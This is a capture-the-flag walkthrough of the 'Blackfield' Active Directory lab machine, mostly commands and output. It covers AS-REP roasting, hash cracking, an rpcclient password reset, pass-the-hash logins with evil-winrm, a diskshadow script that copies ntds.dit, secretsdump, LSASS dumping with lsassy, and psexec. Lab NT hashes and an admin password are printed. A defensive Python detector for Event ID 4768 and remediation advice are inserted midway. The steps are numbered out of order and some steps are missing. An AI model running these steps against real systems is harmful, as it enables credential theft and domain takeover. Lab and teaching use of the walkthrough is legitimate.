Blackfield
1. Open ports:
```
# masscan -i tun0 10.10.10.192 -p0-65535 --rate 10000
Discovered open port 88/tcp on 10.10.10.192
Discovered open port 445/tcp on 10.10.10.192
Discovered open port 593/tcp on 10.10.10.192
Discovered open port 135/tcp on 10.10.10.192
53/udp open domain (generic dns response: SERVFAIL)
```
2. SMB listing:
```
# smbclient -L //10.10.10.192
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
forensic        Disk      Forensic / Audit share.
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
profiles$       Disk
SYSVOL          Disk      Logon server share
# smbclient //10.10.10.192/profiles$
smb: \> dir
  .                                   D        0  Wed Jun  3 16:47:12 2020
  ..                                  D        0  Wed Jun  3 16:47:12 2020
  AAlleni                             D        0  Wed Jun  3 16:47:11 2020
  ABarteski                           D        0  Wed Jun  3 16:47:11 2020
--[SNIP]--
```
3. Copy the usernames to a file users.txt and request AS-REP hashes for accounts that do not require Kerberos pre-authentication:
```
# GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -format hashcat -output hashes.asreproast -dc-ip 10.10.10.192
...
[*]Getting TGT for support
$krb5asrep$23$support@BLACKFIELD.LOCAL:422866063277e0f25f87931e6c192bba$cbe1cd7085635f4b1c527d3e42fe9d3a2417581bb24ba9ae75aa1cfceff09e071474aa7b535322575c06527cbd0afeaead168eb52488cd1ef4e81f231c1d5bee649b5eab98cb9c9a164330a254e2d4a4c80104f46a77aeb3aa108012546cda176a34eff1679fc4c72396e8c55b30b6ba79eece732dfd507830b5fba05544f8a31dd642c47f6fed69daaa5074cf6cddc212c71ca2a9718bf20039064025b911143e001e19f960d9d24a776df1edde005c0c2ec484c92dacb4c6495aa4b38547304efedbb60e341eeeee8217477a0b375a48ea86beb4552ec2b4e6cbbaf0d5976e6b5bf9c5478aff89bd7bf5bc3b420fc741fbd62d
```
4. Crack it:
```
# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.asreproast
```
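The defender's view of the same step, as an added example that is not part of the original writeup: a Python check over constructed Event ID 4768 records (field names as in the Windows Security log, account names and addresses made up) that flags TGT requests the DC answered without pre-authentication, plus a parser for the hashcat-style `$krb5asrep$` line shown above so a recovered hash can be tied back to the matching 4768 event.

```python
import re

# Constructed sample Security-log export (not from the original writeup): 4768 TGT
# requests flattened to "Field: Value;" pairs, as a log forwarder might emit them.
SAMPLE_EVENTS = [
    "EventID: 4768; Account Name: support; Supplied Realm Name: BLACKFIELD.LOCAL; "
    "Client Address: ::ffff:10.10.14.5; Ticket Encryption Type: 0x17; "
    "Pre-Authentication Type: 0; Result Code: 0x0",
    "EventID: 4768; Account Name: svc_backup; Supplied Realm Name: BLACKFIELD.LOCAL; "
    "Client Address: ::ffff:10.10.10.50; Ticket Encryption Type: 0x12; "
    "Pre-Authentication Type: 2; Result Code: 0x0",
    "EventID: 4768; Account Name: audit2020; Supplied Realm Name: BLACKFIELD.LOCAL; "
    "Client Address: ::ffff:10.10.14.5; Ticket Encryption Type: 0x17; "
    "Pre-Authentication Type: 2; Result Code: 0x0",
    "EventID: 4769; Account Name: support@BLACKFIELD.LOCAL; "
    "Ticket Encryption Type: 0x17; Result Code: 0x0",
]
# hashcat-style AS-REP line: $krb5asrep$<etype>$<user>@<realm>:<checksum>$<edata2>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$", re.IGNORECASE)

def parse_event(line):
    """Turn 'Field: Value; Field: Value' into a dict; values stay strings."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def asrep_roast_candidates(lines):
    """Return (account, client, etype) for successful TGT requests made without
    pre-authentication (Pre-Authentication Type 0): that AS-REP is offline-crackable.
    etype 0x17 (RC4-HMAC, decimal 23) is the '23' in the $krb5asrep$23$ tag above."""
    hits = []
    for ev in map(parse_event, lines):
        if ev.get("EventID") != "4768" or ev.get("Result Code") != "0x0":
            continue
        if ev.get("Pre-Authentication Type") == "0":
            hits.append((ev["Account Name"], ev["Client Address"],
                         int(ev["Ticket Encryption Type"], 16)))
    return hits

def parse_asrep_hash(line):
    """Split a hashcat-format AS-REP line into (etype, user, realm) for matching."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    return int(m["etype"]), m["user"], m["realm"]
```

Accounts that show up here are the ones with "Do not require Kerberos preauthentication" set; clearing that flag, or moving them to AES-only keys, removes the RC4 AS-REP the writeup cracks.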
5. Using the support account we can reset the password of audit2020 (see https://malicious.link/post/2017/reset-ad-user-password-with-linux/):
```
# rpcclient -U support //10.10.10.192
rpcclient $> setuserinfo2 audit2020 23 'ICanHaz1ChzBrger'
rpcclient $> quit
# smbclient.py audit2020@10.10.10.192
WORKS!!
```
1. Using the found hash I can log in with evil-winrm as svc_backup:
```
# evil-winrm -H 9658d1d1dcd9250115e2205d9f48400d -u svc_backup -i 10.10.10.192
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ..\Desktop
```
2. Time to privesc:
```
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all
```
3. While enumerating you will find notes.txt on the Administrator's desktop. Since svc_backup has the backup privilege, robocopy in backup mode (/B) can copy files the account could not otherwise read:
```
*Evil-WinRM* PS C:\Documents and Settings\Administrator\Desktop> robocopy C:/Users/Administrator/Desktop/ C:\Temp\ /B
100%
```
4. Read the notes:
```
*Evil-WinRM* PS C:\Temp\> type notes.txt
```
5. diskshadow.txt (leave the spaces at the end of every line or else it will not work):
```
set context persistent nowriters
add volume c: alias tester
create
expose %tester% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\4thelolz\ntds.dit
delete shadows volume %tester%
reset
```
6. Download both files:
```
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color\> download ntds.dit
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color\> download system.bak
```
7. Extract the hashes offline:
```
# secretsdump.py -ntds ntds.dit -system system.bak LOCAL
```
8. Connect with evil-winrm using the hash as administrator:
```
# evil-winrm -H 184fb5e5178480be64824d4cd53b99ee -u administrator -i 10.10.10.192
```
Using lsassy we can get the cleartext password and then NT Authority\System:
```
# lsassy -d BLACKFIELD.LOCAL -u Administrator -H 184fb5e5178480be64824d4cd53b99ee 10.10.10.192 -m 0 --procdump /opt/Sysinternals/procdump.exe --dumpert /opt/Sysinternals/dumpert.exe
```
NT Authority\System:
```
# psexec.py Administrator:###_ADM1N_3920_###@10.10.10.192
# evil-winrm -p "###_ADM1N_3920_###" -u administrator -i 10.10.10.192
```
Administrator hash line from the dump:
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
```